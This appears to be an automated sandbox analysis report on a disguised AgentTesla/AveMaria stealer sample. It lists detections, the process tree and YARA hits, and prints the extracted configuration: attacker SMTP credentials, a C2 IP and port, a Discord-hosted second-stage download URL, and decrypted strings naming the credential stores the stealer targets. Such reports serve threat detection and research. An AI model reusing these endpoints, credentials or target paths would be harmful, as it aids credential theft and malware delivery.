Windows Analysis Report
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Overview

General Information

Sample Name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Original Sample Name:QUOTATION_SEPT9FIBA00541PDF.scr.exe
Analysis ID:1310586
MD5:404e68a96892ecfcb88a114e31abb55c
SHA1:01db0f21268b21aeeced4445220c1ab38aa74913
SHA256:4a564bf525a47e450c43e6dfa9bc9de4395e6dfb9707d1682f88dc86046e69a0
Tags:exe
Infos:

Detection

AgentTesla, AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected AgentTesla
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected AveMaria stealer
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses ipconfig to lookup or modify the Windows network settings
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Installs a global keyboard hook
Increases the number of concurrent connection per server for Internet Explorer
Contains functionality to hide user accounts
Contains functionality to log keystrokes (.Net Source)
Contains functionality to steal e-mail passwords
Contains functionality to steal Chrome passwords or cookies
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to inject threads in other processes
Contains functionality to create new users
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to enumerate running services
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Contains functionality to retrieve information about pressed keystrokes
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
Detected TCP or UDP traffic on non-standard ports
Contains functionality to download and launch executables
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Uses Microsoft's Enhanced Cryptographic Provider
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe (PID: 6840 cmdline: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe MD5: 404E68A96892ECFCB88A114E31ABB55C)
    • cmd.exe (PID: 6896 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 6936 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)
    • dllhost.exe (PID: 4788 cmdline: C:\Windows\system32\DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800} MD5: 2528137C6745C4EADD87817A1909677E)
    • cmd.exe (PID: 492 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 2364 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)
    • AppLaunch.exe (PID: 4788 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)
      • donexx.exe (PID: 6436 cmdline: "C:\Users\user\AppData\Local\Temp\donexx.exe" MD5: 5CA8DE5B7C87D36341F0578A03615AEE)
        • aspnet_compiler.exe (PID: 2472 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: A1CC6D0A95AA5C113FA52BEA08847010)
  • Fhzejfh.exe (PID: 5712 cmdline: "C:\Users\user\AppData\Roaming\Fhzejfh.exe" MD5: 5CA8DE5B7C87D36341F0578A03615AEE)
  • Fhzejfh.exe (PID: 5620 cmdline: "C:\Users\user\AppData\Roaming\Fhzejfh.exe" MD5: 5CA8DE5B7C87D36341F0578A03615AEE)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: Ave Maria, AveMariaRAT, avemaria
Description: Information stealer which uses AutoIT for wrapping.
Attribution: Anunak
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

{"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}
{"C2 url": "91.207.102.163", "port": 26167}

Source: 00000024.00000002.472719163.00000000029EC000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 00000026.00000002.472797955.000000000287C000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 00000026.00000002.473331957.00000000038D2000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 00000019.00000002.408610902.0000000002C4A000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 00000026.00000002.472797955.0000000002884000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security

Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.5410000.17.unpack, Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Author: Joe Security
Source: 33.2.aspnet_compiler.exe.400000.1.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 33.2.aspnet_compiler.exe.400000.1.unpack, Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Author: Joe Security
Source: 33.2.aspnet_compiler.exe.400000.1.unpack, Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Author: unknown
  • 0x18720:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
  • 0x17008:$a2: SMTP Password
  • 0x16248:$a3: select signon_realm, origin_url, username_value, password_value from logins
  • 0x185a8:$a5: for /F "usebackq tokens=*" %%A in ("
  • 0x16a38:$a6: \Torch\User Data\Default\Login Data
  • 0x175a4:$a8: "os_crypt":{"encrypted_key":"
  • 0x16ed0:$a10: \logins.json
  • 0x1751c:$a11: Accounts\Account.rec0
  • 0x18348:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
Source: 33.2.aspnet_compiler.exe.400000.1.unpack, Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Author: Florian Roth
  • 0x16678:$a1: \Opera Software\Opera Stable\Login Data
  • 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data

No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: 91.207.102.163, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Roaming\Fhzejfh.exe, Avira: detection malicious, Label: TR/AD.MortyStealer.wzwcq
Source: C:\Users\user\AppData\Local\Temp\donexx.exe, Avira: detection malicious, Label: TR/AD.MortyStealer.wzwcq
Source: 25.2.donexx.exe.2b95e08.9.raw.unpack, Malware Configuration Extractor: AveMaria {"C2 url": "91.207.102.163", "port": 26167}
Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, ReversingLabs: Detection: 44%
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, Virustotal: Detection: 46%
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, Avira: detected
Source: Yara match, File source: 33.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match, File source: 25.2.donexx.exe.3aef7b0.17.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 25.2.donexx.exe.3aef7b0.17.unpack, type: UNPACKEDPE
Source: Yara match, File source: 25.2.donexx.exe.2b95e08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 25.2.donexx.exe.2b90e08.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 33.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000019.00000002.408924727.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000021.00000002.471459745.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000019.00000002.408610902.0000000002B47000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: 91.207.102.163, Virustotal: Detection: 17%
Source: C:\Users\user\AppData\Local\Temp\donexx.exe, ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\donexx.exe, Virustotal: Detection: 47%
Source: C:\Users\user\AppData\Roaming\Fhzejfh.exe, ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Roaming\Fhzejfh.exe, Virustotal: Detection: 47%
Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe, Joe Sandbox ML: detected
String decryptor output, Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpack (one decrypted string per line, in report order):
  • /log.tmp
  • <br>[
  • yyyy-MM-dd HH:mm:ss
  • ]<br>
  • <br>
  • Time:
  • MM/dd/yyyy HH:mm:ss
  • <br>User Name:
  • <br>Computer Name:
  • <br>OSFullName:
  • <br>CPU:
  • <br>RAM:
  • <br>
  • IP Address:
  • <br>
  • <hr>
  • New
  • MM/dd/yyyy HH:mm:ss
  • IP Address:
  • false
  • Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
  • true
  • false
  • true
  • false
  • false
  • false
  • true
  • false
  • smtp.yandex.com
  • frankneymars42@yandex.com
  • uikstcmljdzhturh
  • frankneymars42@yandex.com
  • true
  • false
  • false
  • appdata
  • cGwIUTI
  • cGwIUTI.exe
  • cGwIUTI
  • Type
  • http://cdn.discordapp.com/attachments/1152164172566630421/1153190859320328273/Vvdsupbjet.exe
  • \donexx.exe
  • \donexx.exe
  • <br>
  • <hr>
  • <br>
  • <b>[
  • ]</b> (
  • )<br>
  • {BACK}
  • {ALT+TAB}
  • {ALT+F4}
  • {TAB}
  • {ESC}
  • {Win}
  • {CAPSLOCK}
  • {KEYUP}
  • {KEYDOWN}
  • {KEYLEFT}
  • {KEYRIGHT}
  • {DEL}
  • {END}
  • {HOME}
  • {Insert}
  • {NumLock}
  • {PageDown}
  • {PageUp}
  • {ENTER}
  • {F1}
  • {F2}
  • {F3}
  • {F4}
  • {F5}
  • {F6}
  • {F7}
  • {F8}
  • {F9}
  • {F10}
  • {F11}
  • {F12}
  • control
  • {CTRL}
  • &amp;
  • &lt;
  • &gt;
  • &quot;
  • <br><hr>Copied Text: <br>
  • <hr>
  • logins
  • IE/Edge
  • 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • Windows Secure Note
  • 3CCD5499-87A8-4B10-A215-608888DD3B55
  • Windows Web Password Credential
  • 154E23D0-C644-4E6F-8CE6-5069272F999F
  • Windows Credential Picker Protector
  • 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • Web Credentials
  • 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • Windows Credentials
  • E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • Windows Domain Certificate Credential
  • 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • Windows Domain Password Credential
  • 3C886FF3-2669-4AA2-A8FB-3F6759A77548
  • Windows Extended Credential
  • 00000000-0000-0000-0000-000000000000
  • SchemaId
  • pResourceElement
  • pIdentityElement
  • pPackageSid
  • pAuthenticatorElement
  • IE/Edge
  • UC Browser
  • UCBrowser\
  • Login Data
  • journal
  • wow_logins
  • Safari for Windows
  • \Common Files\Apple\Apple Application Support\plutil.exe
  • \Apple Computer\Preferences\keychain.plist
  • <array>
  • <dict>
  • <string>
  • </string>
  • <string>
  • </string>
  • <data>
  • </data>
  • -convert xml1 -s -o "
  • \fixed_keychain.xml"
  • \Microsoft\Credentials\
  • \Microsoft\Credentials\
  • \Microsoft\Credentials\
  • \Microsoft\Credentials\
  • \Microsoft\Protect\
  • credential
  • QQ Browser
  • Tencent\QQBrowser\User Data
  • \Default\EncryptedStorage
  • Profile
  • \EncryptedStorage
  • entries
  • category
  • Password
  • str3
  • str2
  • blob0
  • password_value
  • IncrediMail
  • PopPassword
  • SmtpPassword
  • Software\IncrediMail\Identities\
  • \Accounts_New
  • PopPassword
  • SmtpPassword
  • SmtpServer
  • EmailAddress
  • Eudora
  • Software\Qualcomm\Eudora\CommandLine\
  • current
  • Settings
  • SavePasswordText
  • Settings
  • ReturnAddress
  • Falkon Browser
  • \falkon\profiles\
  • profiles.ini
  • startProfile=([A-z0-9\/\.\"]+)
  • profiles.ini
  • \browsedata.db
  • autofill
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ClawsMail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Claws-mail
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \clawsrc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \clawsrc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: passkey0
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: master_passphrase_salt=(.+)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \accountrc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: smtp_server
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: address
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: account
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \passwordstorerc
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: {(.*),(.*)}(.*)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Flock Browser
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Flock\Browser\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: signons3.txt
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: DynDns
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ALLUSERSPROFILE
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Dyn\Updater\config.dyndns
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: username=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password=
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: https://account.dyn.com/
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: t6KzXhCh
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ALLUSERSPROFILE
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Dyn\Updater\daemon.cfg
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: global
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: accounts
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: account.
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: username
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: account.
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Psi/Psi+
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: name
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Psi/Psi+
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Psi\profiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Psi+\profiles
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \accounts.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \accounts.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: OpenVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\OpenVPN-GUI\configs
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Software\OpenVPN-GUI\configs\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: username
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: auth-data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: entropy
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: USERPROFILE
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \OpenVPN\config\
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: remote
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: remote
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVpn.exe*
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: user.config
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: //setting[@name='Username']/value
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: //setting[@name='Password']/value
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: NordVPN
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Private Internet Access
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: %ProgramW6432%
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Private Internet Access\data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: ProgramFiles(x86)
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \Private Internet Access\data
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \account.json
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: .*"username":"(.*?)"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: .*"password":"(.*?)"
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Private Internet Access
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: privateinternetaccess.com
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: FileZilla
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FileZilla\recentservers.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: APPDATA
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: \FileZilla\recentservers.xml
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Server>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Host>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Host>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Host>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Port>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <User>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <User>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </User>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Pass>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: <Pass encoding="base64">
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: </Pass>
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: CoreFTP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: User
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Host
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Port
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: hdfzpysvpzimorhk
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: WinSCP
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: HostName
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: UserName
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: Password
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PublicKeyFile
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: PortNumber
                  Source: 0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.3c57a48.10.raw.unpackString decryptor: [PRIVATE KEY LOCATION: "{0}"]
